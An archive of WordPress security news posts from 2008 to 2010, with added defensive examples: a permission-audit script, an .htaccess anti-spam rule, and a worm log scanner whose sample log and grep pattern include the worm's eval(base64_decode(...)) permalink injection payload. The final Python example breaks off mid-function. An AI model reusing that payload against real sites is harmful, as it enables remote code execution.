Check your web host file permissions first!

November 23, 2010 | No Comments Yet

WordPress security issues come and go. Some stay because it’s tough to get the crud out, but other times it’s because site owners overlook an important part of keeping their hosts protected: file permissions.

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

Matt Mullenweg warns against web hosts and other security announcements that place the blame on the WordPress software without first checking if proper file permissions are in place.

Devlounge has an old but still applicable article on protecting your wp-config.php files, for starters. This article on WP Tavern also tackles the issue above and shares more file permission advice especially on shared hosting accounts.
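As an added example (not code from the original post or from any of the articles it links), here is a small POSIX shell audit of the part a site owner actually controls, the file modes under the WordPress root; the suexec-style isolation mentioned above is the host’s job and is not checked. The 755/644/600 baseline in fix_wp_perms is an assumption, not a figure from the post, and the sample tree it runs on is constructed.

```shell
#!/bin/sh
# Added example, not code from the original post: audit the file modes under a
# WordPress document root. Findings are printed one per line as "<reason>: <path>".

# List permission problems under the directory given as $1
audit_wp_perms() {
    root=$1
    # Writable by "others": any account on a shared host could modify the file
    find "$root" -perm -002 -print | sed 's|^|world-writable: |'
    # Writable by the group (not already reported as world-writable)
    find "$root" -perm -020 ! -perm -002 -print | sed 's|^|group-writable: |'
    # wp-config.php holds the database credentials: owner-readable only
    find "$root" -name wp-config.php \( -perm -004 -o -perm -040 \) -print \
        | sed 's|^|config-readable: |'
}

# Number of findings, for a quick pass/fail check
count_findings() {
    audit_wp_perms "$1" | wc -l | tr -d ' '
}

# Apply a common baseline (an assumption, not a setting from the post):
# directories 755, files 644, wp-config.php 600
fix_wp_perms() {
    root=$1
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    if [ -f "$root/wp-config.php" ]; then
        chmod 600 "$root/wp-config.php"
    fi
}

# Constructed sample tree (not a real install) with the modes the post warns about
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/wp-content/uploads" "$dir/wp-admin"
    printf '<?php // constructed sample\n' > "$dir/wp-config.php"
    printf '<?php\n' > "$dir/index.php"
    printf '<?php\n' > "$dir/wp-content/plugin.php"
    chmod 755 "$dir" "$dir/wp-content" "$dir/wp-admin"
    chmod 644 "$dir/index.php"
    chmod 644 "$dir/wp-config.php"          # readable by everyone: flagged
    chmod 777 "$dir/wp-content/uploads"     # world-writable: flagged
    chmod 664 "$dir/wp-content/plugin.php"  # group-writable: flagged
    printf '%s\n' "$dir"
}

# Demo run: audit the sample, fix it, audit again
sample=$(make_sample_tree)
echo "Before fix:"
audit_wp_perms "$sample"
fix_wp_perms "$sample"
echo "Findings after fix: $(count_findings "$sample")"
rm -rf "$sample"
```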


WordPress .htaccess tips

October 8, 2010 | No Comments Yet

Controlling how URLs behave and who can access your site relies on the .htaccess file, and while some of the things it can do have a comfortable interface inside WordPress, there’s so much more to explore. WP Shout goes from A to Z of those possibilities.

For example, to cut down on comment spambots, deny comment POSTs that arrive without a referrer (or without a user agent) with this code:

RewriteEngine On
# Only look at POST requests to the comment handler
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} wp-comments-post\.php
# ...that carry no referrer from your own domain (replace yourblog.com)
RewriteCond %{HTTP_REFERER} !.*yourblog.com.* [OR]
# ...or an empty User-Agent header
RewriteCond %{HTTP_USER_AGENT} ^$
# Bounce the request back at the sender instead of running wp-comments-post.php.
# The substitution is a plain string, not a regex, so no ^ or $ anchors belong here.
# Note that Referer and User-Agent are supplied by the client, so this only stops
# bots that don't bother to fake them.
RewriteRule (.*) http://%{REMOTE_ADDR}/ [R=301,L]

Need to study the somewhat cryptic .htaccess language further? Head over to Apache’s official documentation.


Tips on keeping your WordPress blog secure

July 22, 2010 | No Comments Yet

Make Tech Easier shares 11 tips on keeping malicious parties from penetrating your WordPress-powered blog. Here’s a snippet:

7) Change your login name

The default username is admin. You can make it more difficult for the hacker to crack your login credential by changing the login name.

You can never be too careful about these things, so be sure to follow the tips mentioned in the article.



Mark Jaquith on WordPress and web hosting

May 17, 2010 | No Comments Yet

WordPress lead developer Mark Jaquith sounds off on the state of web hosting companies and their lack of support for the publishing software. He emphasizes two of the biggest issues WordPress users have when it comes to maintaining their installs: caching and security.

People ask me for hosting recommendations all the time. I have a few decent hosts that I’ll recommend, but I don’t have any hosts about which I can say “use them, because they know how to host WordPress, and they’ll support you.” I’d like nothing better than to have a dozen such hosts to recommend by this time next year. WordPress is here to stay, and it’s time for web hosts to adapt!

This is just the first of many voices from WordPress community leaders cementing an initiative for better WP support, as mentioned in the State of the Word at WordCamp SF 2010. I think the greatest lesson here is never to settle with just any web host. With so many choices out there and your own site and brand on the line, choosing a proper, WordPress-friendly host should be top priority. You can’t afford not to.

As for the web hosting companies themselves, it’s a great opportunity to improve their game and offer specialized services that help with the upkeep of their respective client websites. A win-win for all.


Matt’s State of the Word at WordCamp SF 2010

May 14, 2010 | No Comments Yet

If you missed the notes on Matt’s keynote address at this year’s WordCamp San Francisco, the full video has finally been posted at WordPress.tv and is embedded above.

Look how far WordPress has come in the span of a year. We’re still awaiting the final release of WordPress 3.0 for the much-touted WordPress MU/Multi Site merge, but we’re also getting a bunch of other exciting, game-changing features such as custom post types, a new default WordPress theme every year, canonical plugins, security checks, and more.

Can’t wait to see what will be added to this keynote when WordCamp Philippines 2010 comes around in October.


Matt Mullenweg WordCamp SF keynote & Mashable interview

May 3, 2010 | No Comments Yet

WP Tavern has posted notes from Matt Mullenweg’s State of the Word at the 2010 WordCamp San Francisco. In it, Matt emphasizes the growth of WordPress into one of the most popular content management systems today: from the admin interface, to the number of plugins, to the upcoming features in WordPress 3.0: WordPress MU merge, menu navigation system, custom post types, and more.

Roughly 74% of WordPress sites are being used as blogs and content management systems. This is up from about 40% last year. It’s the fastest growing use case of the software. About 80% of people are making money from WordPress. 22% WordPress is their day job. 18% from custom development and hosting, 12%.

Other things to take from the talk:

  • A new default WordPress theme will be created every year. This year’s Twenty Ten features custom post headers and backgrounds.
  • WordPress should be as accessible as possible: the Post By Email feature will be turned into a canonical plugin.
  • WordPress.org will be redesigned.
  • Release cycles will go from 3 per year to 2.
  • On security issues: Automattic will work with web hosting companies to help protect its WordPress users, via a mailing list, security checks, and a list of best practices.

Mashable also conducted an interview with him, which covers pretty much the same things discussed at WordCamp. Watch it below:


Must-have plugins for every WordPress blog

April 2, 2010 | 1 Comment

BloggingPro compiles a list of 10 + 5 WordPress plugins every blog should have. It covers the basics from good ol’ Akismet to security, performance, and analytics plugins.

It doesn’t matter what the aim of your blog is, whether you set out to become the next person getting rich in only 4 hours per week, want to run the hottest dating column in town, aim to take Arrington’s crown or just want to blog for fun; if you chose WordPress there are some basics your blog needs.

The shortlist:

  • A Solid Theme
  • Akismet
  • Google XML Sitemap
  • Align RSS Images
  • AntiVirus for WordPress
  • Subscribe to comments
  • WP Super Cache
  • WP.com stats
  • WP Twitip-ID
  • FeedBurner FeedSmith
  • The Excerpt Reloaded
  • WP Footnotes
  • Future Dashboard Widget
  • WP Table Reloaded

What’s on your must-have plugins list?


Automattic launches VaultPress backup & protection service

April 1, 2010 | No Comments Yet


VaultPress is a premium offering from Automattic that lets you back up and, more interestingly, protect your WordPress-powered site:

In the future, if your site is tampered with in any way, we’ll know within minutes and can take appropriate steps. The VaultPress core engine will be able to protect you against zero-day security vulnerabilities by updating your blog with hot-fixes, even while you sleep.

VaultPress runs as a plugin that monitors and responds in real time. It will also be closely integrated with WordPress.com. On the invitation-only beta signup page, the service costs $20 monthly. It also classifies users into personal, pro-blogger, small business, and enterprise tiers.


More than a dozen useful WordPress database queries

March 1, 2010 | No Comments Yet

Secure, clean up, and optimize your blog with 10 “life-saving” SQL queries from Cats Who Code. Most of them are short and should work by simply copying & pasting them into your database manager. Here’s what you can do:

  1. Manually change your password
  2. Transfer posts from one user to another
  3. Delete post revisions and meta associated to those revisions
  4. Batch delete spam comments
  5. Find unused tags
  6. Find and replace data
  7. Get a list of your commentators’ emails
  8. Disable all your plugins at once
  9. Delete all tags
  10. List unused post meta
  11. Disable comments on older posts
  12. Replace commentator url
  13. Replace commentator email address
  14. Delete all comments with a specific url

The article also recommends an SQL WordPress plugin so you don’t have to go anywhere else to execute the queries. If you’re not familiar with SQL, the best way to learn is by example! As a precautionary measure, however, make sure to have a database backup ready before doing any database manipulation.


WordPress 2.9.2

February 16, 2010 | 1 Comment

WordPress 2.9.2 fixes a bug that lets logged-in users see trashed posts created by other authors. It’s not a very urgent update except for those who find the Trash bug an inconvenience, but it’s still wise to download the latest version whenever you can. This should give you ample time to back up first.

Haven’t used the new Trash feature before? Here’s a walkthrough on it and here’s how to customize it.


WordPress upgrade notifications from Google Analytics?

December 1, 2009 | No Comments Yet

If you’ve been blogging for a while now you’ll know that Google Analytics is an indispensable part of your website, so perhaps it’s not surprising that the service has this new feature: software version notifications for your CMS.

One of the great things about working at Google is that we get to take advantage of an enormous amount of computing power to do some really cool things. One idea we tried out was to let webmasters know about their potentially hackable websites. [...] This time, however, our goal is not just to isolate vulnerable or hackable software packages, but to also notify webmasters about newer versions of the software packages or plugins they’re running on their website. [...] This is where we think we can help. We hope to let webmasters know about new versions of their software by sending them a message via Webmaster Tools. This way they can make an informed decision about whether or not they would like to upgrade.

I’m not sure this is any better than installing a plugin such as Update Notifier that sends emails whenever your WP installation or WP plugins need updating. After all, it still depends on the generated version meta tag which both WordPress and hackers use to check.

The upside here, though, is that at least Google is now looking into ways they can help with website maintenance, particularly security. And not just for WordPress, but for all other content management systems out there. Both CMS developers and webmasters stand to gain from the knowledge and resources Google can spend on this.

In the meantime, keep your eyes peeled as this new feature will be rolling out “soon”.

(Via WPLover)


WordCamp Philippines 2009 talk: WordPress in the Wild

November 26, 2009 | No Comments Yet

Markku Seguerra just blogged about his talk in this year’s WordCamp Philippines called “WordPress in the Wild”:

WordPress used to simply be a blogging app and not much more. Its growth in the past few years though has pushed it to adapt a more extensible structure to allow for other uses beyond blogging as well as various other customizations. These changes made it more appealing to a wider range of users, but at the same time it also introduced some performance bottlenecks that become apparent when your blog rises to be just a bit too popular. Ah, the price of success.

His slides on WordPress deployment, performance, optimization, and security are embedded in the post, but scroll down for all the important links and points covered by his presentation. A bit on the technical side, but definitely a must-read for everyone running a WordPress website.


WordPress 2.8.6

November 13, 2009 | No Comments Yet

WordPress 2.8.6 is another important security release that tackles vulnerabilities in the Press This bookmarklet and upload file names.

The first problem is an XSS vulnerability in Press This discovered by Benjamin Flesch. The second problem, discovered by Dawid Golunski, is an issue with sanitizing uploaded file names that can be exploited in certain Apache configurations. Thanks to Benjamin and Dawid for finding and reporting these.

Upgrade now!


WordPress Plugins Directory adds user-voted compatibility checker

October 28, 2009 | No Comments Yet


WordPress plugins listed at WordPress.org’s official plugin directory now have a new feature for compatibility checking. It uses the naturally-helpful WordPress community to gather statistics on how compatible a plugin is for a certain WordPress version. Weblog Tools Collection reports:

Normally, the plugin information within the FYI box tells you which version of WordPress is required and which version the plugin is compatible up to. Unfortunately, the version the plugin is compatible up to is not updated that often which is why some plugins which state that they only work up to WordPress 2.5 end up working with the latest release.

[...] The beauty of this system is that it leverages the community in order to figure out what works with what. However, just because it works for the majority of users is no guarantee it will work on your particular setup. But using these statistics, it should make it easier to figure out whether the issue is with the plugin and WordPress or with your setup.

One of the biggest fears users have when it comes time to upgrade WordPress is whether their plugins will work on the newest version or not. There are a large handful of people who upgrade to the latest version of WordPress as soon as it’s released and the hope is, these folks will visit the plugin page and report their findings for others to take advantage of. If more users see that their plugins work on the newest version, they are more likely to upgrade.

It’s not yet on all plugins, and it doesn’t appear yet inside the details screen when you install from within your WP admin, but expect that to change soon. After all, this feature is still in beta.

But the biggest advantage, as WLTC notes in the last paragraph above, is key here. WordPress-powered sites often stay outdated and unable to fight off security attacks because their owners fear that incompatible plugins will break their site. This checker should help quell those fears. And of course, this is a great incentive to make sure you’re grabbing plugins from the most legitimate source out there.


WordPress 2.8.5

October 21, 2009 | No Comments Yet

WordPress has come out with yet another security upgrade (they call it a “hardening release”), notably in line with this trackback-related 0-day exploit.

As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.

The WordPress team also recommends users to install the WordPress Exploit Scanner plugin, which you can download here.


Long term support for old WordPress branches? Not likely

September 22, 2009 | No Comments Yet

From WPTavern’s report on the latest WordPress Dev Chat, one of the questions raised was the possibility of bringing back long-term support (LTS) for older versions of WordPress in light of the security issues that have been plaguing the software. The short answer? No way.

jeffr0 – Directed at Mark. Has there been any talk of a new supported legacy branch?

Considering the security stuff earlier this month, some folks have been suggesting that WordPress bring back a supported legacy branch of WordPress. I decided to ask if any talk of this has been ongoing in the inner dev circle and Mark replied that he wasn’t aware of any. In fact, Mark stated he would be extremely opposed to an LTS (Long Term Service) branch. Sivel doesn’t think it is something that they are ready to undertake.

MarkJaquith – I’d rather direct resources to making upgrades smoother and showcasing well-coded plugins that won’t break on upgrade.

westi – The only way a LTS branch is going to exist is if the person that wants it creates it. our resources are better directed elsewhere

Clearly the WordPress development team is focused on moving forward rather than stepping back. If you ask me, as long as they’re putting security and the push to keep people’s WordPress versions up-to-date as top priorities, it’s all good. People usually put plugin compatibility before blog security, and that’s really not a responsible thing to do. Having little to no support for outdated versions of WordPress is one of the ways to change this bad habit.

(Via BloggingPro)


WordPress Plugin: Upgrade Notification by Email

September 8, 2009 | No Comments Yet

Upgrade Notification by Email does exactly what it is called: anytime WordPress sends out a new update, your blog administrator’s email inbox will receive a notice that you should upgrade. Now you have no excuse to install the latest, most secure version of WordPress on your website as soon as possible.

This plugin is for you if you don’t look inside your Admin Panel every day (for example, you have tens of WordPress installations) but still want to have WordPress up to date. After installation the plugin will check every day whether a newer version of WordPress is available and, if so, will send an email to the blog’s admin with a notification.

Download Upgrade Notification by Email


Update and secure your WordPress installation

September 7, 2009 | No Comments Yet

There’s a worm circling the WordPress community and it’s attacking all sites that have not been updated to version 2.8.4. Lorelle reported its symptoms:

  1. “There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.””
  2. “The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.”

This certainly sounds familiar. Matt explains further:

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

It must be stressed that upgrading is a preventive measure; if you’ve been attacked, you’ll need to go through your files and databases to get rid of the offending code.

A stitch in time saves nine. Upgrading is a known quantity of work, and one that the WordPress community has tried its darndest to make as easy as possible with one-click upgrades. Fixing a hacked blog, on the other hand, is quite hard. Upgrading is taking your vitamins; fixing a hack is open heart surgery. (This is true of cost, as well.)
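As an added example (not code from the original post, Lorelle’s or Matt’s), here is a POSIX shell script that checks for the two symptoms Lorelle lists: it URL-decodes web server access-log lines and flags requests whose path carries the “eval” and “base64_decode” keywords, and it lists user logins that are not on a list you recognise. The log lines and user list are constructed; the first log entry reuses the permalink pattern quoted above and the last one is the same keywords fully percent-encoded, which is why decoding comes first.

```shell
#!/bin/sh
# Added example, not code from the original post: look for the worm's two
# symptoms in an access log and in a wp_users login export.

# URL-decode stdin line by line (%XX -> byte); a "%" not followed by two hex
# digits is copied through unchanged
urldecode() {
    awk '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    {
        s = $0; out = ""
        while ((p = index(s, "%")) > 0) {
            h1 = hexval(substr(s, p + 1, 1)); h2 = hexval(substr(s, p + 2, 1))
            if (length(s) >= p + 2 && h1 >= 0 && h2 >= 0) {
                out = out substr(s, 1, p - 1) sprintf("%c", h1 * 16 + h2)
                s = substr(s, p + 3)
            } else {
                out = out substr(s, 1, p)
                s = substr(s, p + 1)
            }
        }
        print out s
    }'
}

# Print every access-log line (stdin) whose decoded request contains the
# worm's keywords; decoding first means a percent-encoded payload cannot hide
scan_worm_requests() {
    urldecode | grep -E 'eval\(|base64_decode\('
}

# Print each login read from stdin that is not in the known list given as
# arguments (the "Administrator (2)" check from the post)
find_unknown_users() {
    while IFS= read -r login; do
        known=0
        for k in "$@"; do
            [ "$login" = "$k" ] && known=1
        done
        [ "$known" -eq 1 ] || printf '%s\n' "$login"
    done
}

# Constructed sample log (not a real capture) in Apache combined format
sample_log() {
    cat <<'EOF'
203.0.113.7 - - [07/Sep/2009:10:12:31 +0000] "GET /category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [07/Sep/2009:10:13:02 +0000] "GET /2009/09/hello-world/ HTTP/1.1" 200 8450 "-" "Mozilla/5.0"
198.51.100.4 - - [07/Sep/2009:10:13:05 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://example.com/2009/09/hello-world/" "Mozilla/5.0"
203.0.113.7 - - [07/Sep/2009:10:14:40 +0000] "GET /category/post-title/%65%76%61%6C%28%62%61%73%65%36%34%5F%64%65%63%6F%64%65%28 HTTP/1.1" 404 0 "-" "-"
EOF
}

# Constructed user_login list, as you would export it from wp_users
sample_users() {
    printf '%s\n' admin markku 'Administrator (2)'
}

# Counts, handy for scripting a pass/fail check
count_worm_hits() { sample_log | scan_worm_requests | wc -l | tr -d ' '; }
count_unknown_users() { sample_users | find_unknown_users admin markku | wc -l | tr -d ' '; }

echo "Suspicious requests:"; sample_log | scan_worm_requests
echo "Unknown users:"; sample_users | find_unknown_users admin markku
```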


Google’s Matt Cutts praises WordPress for SEO

August 31, 2009 | 1 Comment

Take it from Matt Cutts, head of the Web Spam team at Google: WordPress is a “fantastic” choice for search engine optimization. That’s what he said at his talk at WordCamp San Francisco last May. Here’s the presentation video:

And here are the slides:

According to Matt, “WordPress takes care of 80-90% of (the mechanics of) SEO”. He goes on to explain PageRank calculation, and what you can do within WordPress to improve search engine ranking, from tweaking post permalinks (hyphens are best, underscores next, and running words together with no separator is the worst) to securing your WP install (add .htaccess to your wp-admin folder and update often!).

(Via HowToMakeMyBlog)


WordPress 2.8.4

August 12, 2009 | No Comments Yet

As expected, Automattic promptly released WordPress 2.8.4, a security update to the previously mentioned remote admin password reset vulnerability.

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

Whether you’ve patched your WP installation as instructed or not, better grab this upgrade immediately. As always, backup before doing so!


Remote admin password reset vulnerability issue in WP 2.8.3 and below

August 12, 2009 | 2 Comments

WordPress 2.8.3 just came out, but even this doesn’t seem enough to stop this newly discovered security issue, which resets your administrator password remotely. This was reported by Laurent Gaffié on the Neohapsis mailing list a couple of days ago.

The software vulnerability has been submitted to the WordPress trac, and according to them there’s a one-liner fix: in wp-login.php, change line 190 from

if ( empty( $key ) )

to

if ( empty( $key ) || is_array( $key ) )

Sucuri Security, however, still argues that “they are still using blacklists instead of a whitelist of what should be accepted”.

Expect another security update to your WordPress install very soon. In the meantime, prepare to backup your database and files again!


WordPress Plugin: Absolute Privacy

August 6, 2009 | No Comments Yet

Blogs are usually public publishing platforms, but what if you wanted to keep yours away from prying eyes? Enter Absolute Privacy, a WordPress plugin designed to lock down your WP blog with custom user-access features. You have the option to hide your blog from viewers who are not logged in and to force new registrants to enter their first and last name.

After having a few odd registrations and comments on our family blog, my wife asked me to create a plugin that would give the blog security from strangers but still be easily accessible to family and friends. Absolute Privacy does just that! Absolute Privacy turns your WordPress blog into a fully private site where you control who has access. It’s perfect for family blogs, private communities, and personal websites.

Download Absolute Privacy


WordPress 2.8.3

August 4, 2009 | No Comments Yet

WordPress 2.8.3 just dropped last night. It fixes several security issues that were overlooked with the WP 2.8.1 release, pointed out by several members of the WordPress community. Don’t you love it when everybody helps out?

Download the latest version now or upgrade automatically from your admin panel.


WordPress 2.0.x now deprecated

July 30, 2009 | No Comments Yet

The WordPress development team is now ending support for the WordPress 2.0.x branch, just a few months earlier than the planned 2010 deprecation.

Many of the security improvements to the new versions of WordPress in the last couple of years were complete reworks of how various systems were handled. Porting those changes to the 2.0.x branch would have been a monumental task and could have introduced instability or new bugs. We had to make hard decisions between stability and merging in the latest security enhancements. Additionally, far fewer people stayed on the 2.0.x branch than we anticipated. I take that as a testament to the new features in WordPress and perhaps even more the features offered by plugins, many of which don’t support older versions of WordPress!

The good news is, there are way fewer people who have left their WordPress installations outdated than updated. If you’re part of that group, though, do the right thing and upgrade now! The advantages—both in features and security—far outweigh the disadvantages.


WordPress 2.8.2

July 20, 2009 | No Comments Yet

WordPress 2.8.2 is an important security update that addresses an XSS vulnerability with unsanitized comment author URLs. No betas or release candidates came out before this version, but upgrade away! The notice should already be up in your WordPress admin panel.


WordPress 2.8.1 & WordPress MU 2.8.1

July 11, 2009 | No Comments Yet

The first official release since the big WordPress 2.8 is finally out. Highlights of the new features are listed in the announcement post, but you can also view the complete list here. Lots of fixed glitches, memory improvements, and improved security:

Core Security Technologies notified us that admin pages added by certain plugins could be viewed by unprivileged users, resulting in information being leaked. Not all plugins are vulnerable to this problem, but we advise upgrading to 2.8.1 to be safe.

WordPress MU also came out with version 2.8.1 a day after. Unlike WordPress, WPMU didn’t have a version 2.8, so this is a big update for all you multi-users out there (including BuddyPress). Download it now!

You can upgrade to WP 2.8.1 by downloading it at WordPress.org or by clicking “upgrade automatically” after following the notice in your administration panel.


WordPress Plugin: Injection Attack Protector

July 1, 2009 | No Comments Yet

There are many types of security breaches that threaten your WordPress blog, and spam/malware injection seems to be the most popular of the lot. Fortunately there’s a plugin that helps prevent that, called the Injection Attack Protector. This script lets you scan your site for possible injection attacks and even includes a heal tool for compromised files.

Make sure to follow the given instructions for the plugin to work properly. You’ll need to know how to create a password-protected folder on your site and edit certain files through a text editor.

Download Injection Attack Protector


WordPress 2.8.1 Beta 1

June 22, 2009 | No Comments Yet

Almost two weeks after the big release comes the first beta of WordPress 2.8.1. The bug fixes are listed here, which includes memory fixes and added security.

Instructions for upgrading from WordPress 2.8 to WordPress 2.8.1 beta 1 can be found here. If you still haven’t upgraded to WordPress 2.8 and are more of a cautious user, you might want to wait until WP 2.8.1 comes out.


Protect your WordPress blog with these plugins

June 17, 2009 | No Comments Yet

With WordPress 2.8 out, it’s upgrade season for us. That also means older, un-updated versions of WP are more vulnerable to attack. Keith Dsouza of Weblog Tools Collection has a list of recommended anti-spam and antivirus plugins to help improve security on your blog:

Anti-spam WordPress Plugins

  1. Akismet
  2. WP-SpamFree Anti-Spam
  3. WP-Hashcash
  4. WP reCAPTCHA
  5. Math Comment Spam Protection

Security WordPress Plugins

  1. WP Security Scan
  2. WordPress Exploit Scanner
  3. AskApache Password Protect
  4. TTC WordPress Security Tool
  5. Secure WordPress
  6. WordPress Firewall

Check out the blog post for details and download links to each of the plugins listed above. Got any more plugins you can recommend? You can never have enough!


Errors and blank screens on your WordPress blog? You could have been hacked

April 8, 2009 | No Comments Yet

An important security issue for sites running WordPress: if you get the error “Parse error: syntax error, unexpected T_VARIABLE” or blank screens on your blog, there’s a very good chance that you have been hacked.

Design and Promote has a detailed list of steps for bringing your site back into pristine condition, but if you can’t do that on your own, you can pay them $100.00 for the service. Either way, the first and most important step is finding out if your site has been compromised.


The death of WordPress?

February 21, 2009 | No Comments Yet

How about bringing up the unspeakable for a change: Jeff Chandler at WordPress Tavern looks into the possibilities of WP’s demise. Here’s the shortlist:

  1. Third Party Support Disappears
  2. Change In License
  3. Just A Pile Of Bloat
  4. Someone Else Does It Better
  5. Security Blunders
  6. Leadership Heads South

A lot of the points in the article have been raised in different avenues before, but it will take a combination of several factors for WordPress to really decline. It’s the way the world works; change is constant, and we always move towards something that performs better.

However, I wouldn’t mind the day it becomes much less popular than it is, as long as the dedication of the developers and the community remains. And this is really one of the best features of WordPress today.

(Via WP FUN)


10 ways to secure your WordPress administration panel

January 27, 2009 | No Comments Yet

Sergej Müller and Alex Frison on Smashing Magazine have written a 10-step guide to protecting and ensuring your WordPress admin area is as safe as can be. Here’s the list:

  1. Rename and upload the wordpress Folder
  2. Extend the file wp-config.php
  3. Move the wp-config.php file
  4. Protect the wp-config.php file
  5. Delete the admin User Account
  6. Choose strong passwords
  7. Protect the wp-admin Directory
  8. Suppress Error Feedback on the Log-In Page
  9. Restrict Erroneous Log-In Attempts
  10. Keep Software Up to Date

Read the whole thing here.

It’s best if you perform these safety measures right after installing WordPress, and add it to your routine in case you’ve got a slew of WP-powered sites.


How to secure your WordPress installation

November 13, 2008 | 1 Comment

MyTestBox.com shares several important tips to keep your WordPress install secure. Here’s a summary:

  • Your “plugins” directory is NOT secured by default!
  • Choose a strong password!
  • Rename the administrative account!
  • Backup your database!
  • Log all your $POST variables!
  • Plugins that need write access!
  • Encrypt all communication within “wp-admin” directory! (if possible)
  • Tighten up the file permissions!
  • Of course, update your WordPress!

The last one is the simplest and easiest to follow, especially with the release of WP 2.7. You should at least make sure that you upgrade to the latest version of WordPress.

The blog post also contains links to other articles on hardening WordPress and dealing with hackers, so read it now!


Download WordPress only from WordPress.org, or else

November 7, 2008 | 1 Comment

Weblog Tools Collection reports that people are now taking advantage of the popularity of WordPress to attack unsuspecting users with outdated versions with a fake WordPress version.

If there is one topic that needs to be reblogged, it’s WordPress security. The most important thing you need to remember from this is to only download WordPress from WordPress.org. The URL is http://wordpress.org/ so check to see if that’s what’s in your browser address bar.

There is no WordPress 2.6.4 (we’re at WordPress 2.7 beta 2 already, for crying out loud!). The fake website WordPresz.org will give you a trojanized, phishing, scammed version of WordPress.

And while we’re on the subject of downloads, make sure the themes and plugins you download can be trusted by getting them from WordPress.org’s Extend section.

We know piracy is rampant in the Philippines, but we’re talking about free, open source web software here. There’s no reason not to get WordPress straight from the source.

Recommended reading:


WordPress.com blogs DOS attacked

October 29, 2008 | No Comments Yet

The Blog Herald reports that a denial of service attack hit several WordPress.com blogs on October 27, and even VIP users like the GigaOM Network were not spared.

There’s no official word on any of the WordPress/Automattic blogs, only a tweet from @wordpressdotcom and a post entitled “Anatomy of a Denial of Service Attack”.


WordPress 2.6.3

October 24, 2008 | No Comments Yet

WordPress 2.6.3 provides a security fix for a vulnerability found in the Snoopy library, which according to the project page is a “PHP class that simulates a web browser”.

Since this is a security upgrade, it’s best that you download the latest version immediately. But since only 2 files were updated, i.e. wp-includes/class-snoopy.php and wp-includes/version.php, you can also just grab those and replace the ones on your server.


Is WordPress getting too “fat” and vulnerable?

September 18, 2008 | No Comments Yet

Vladimir Prelovac has written a very insightful critique about the direction of WordPress development. He states several concerns with what this piece of blogging software is turning into. First we have bloat:

But more importantly, I have noticed that WordPress is not developing “far” anymore, and it started going “wide” instead. By this I mean there are less inventions and new technologies with every update. There is just more functionality that relies on current existing technologies.

[...]

WordPress started out like Google, but is now becoming more and more like Yahoo. It stopped going “far” and started becoming fat (“wide”). It is becoming slow and clumsy.

Second, we have security issues, most notably with WordPress plugins. Jeff Chandler at Performancing suggests the WordPress community could adopt phpBB’s plugin validation system.

All in all, Vladimir wants WordPress to focus on speed, simplicity, and security in future WordPress versions.

You’ll find Matt Mullenweg’s answers in the comments section. He mentions WP 2.3 is a lot more bloated and insecure than WP 2.6—better beware of this fact for those who haven’t upgraded! He also says he’s aware of speed issues, hence the integration with Google Gears, and the constant drive towards improving the backend:

I’m obsessed with speed. On the backend WP has done a ton to speed itself up, as evidenced by the fact that it now runs the largest blogs in the world. More than 1.6 billion pageviews a month are going through WordPress.

As for plugins, this is what Matt had to say:

There are some automated things we do to watch out for bad stuff but ultimately I think we need a human team of volunteers to keep an eye on plugin changesets. Is this something you’d be interested in helping out with?

What do you think? I think that as long as there is a strong community backing up WordPress, such issues will never go unnoticed. I can only hope that this same community continues to help out with new initiatives, such as plugin and theme inspection.


WordPress 2.6.2

September 9, 2008 | No Comments Yet

WordPress 2.6.2 is a security release which tackles problems with SQL Column Truncation and mt_rand().

Since WordPress 2.6.1 was an optional update—first time in the history of WordPress—is WP 2.6.2 the same way? Here’s the answer:

If you allow open registration on your blog, you should definitely upgrade. With open registration enabled, it is possible in WordPress versions 2.6.1 and earlier to craft a username such that it will allow resetting another user’s password to a randomly generated password.

The dev blog also notes that this vulnerability is also applicable to other PHP-based applications.

Aside from security fixes, WP 2.6.2 contains a number of bug fixes as well.

Download WordPress 2.6.2 now.
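To make the “craft a username” problem concrete from the defender’s side, here is an added example (my own code, not the 2.6.2 fix itself) of how a registration check should decide uniqueness. It simulates two MySQL behaviours the issue depended on: a non-strict server silently cuts an over-long value down to the column width (wp_users.user_login is VARCHAR(60)), and PAD SPACE collations ignore trailing spaces when comparing. The `USER_LOGIN_WIDTH`, `naive_is_unique` and `username_is_acceptable` names, and the assumption of a case-insensitive collation, are mine.

```python
"""Registration-name check against SQL column truncation (added example).

Simulates non-strict MySQL truncation and PAD SPACE comparison so the weak
and the hardened uniqueness checks can be compared side by side.
"""
USER_LOGIN_WIDTH = 60  # width of wp_users.user_login (VARCHAR(60))


def as_stored(value, width=USER_LOGIN_WIDTH):
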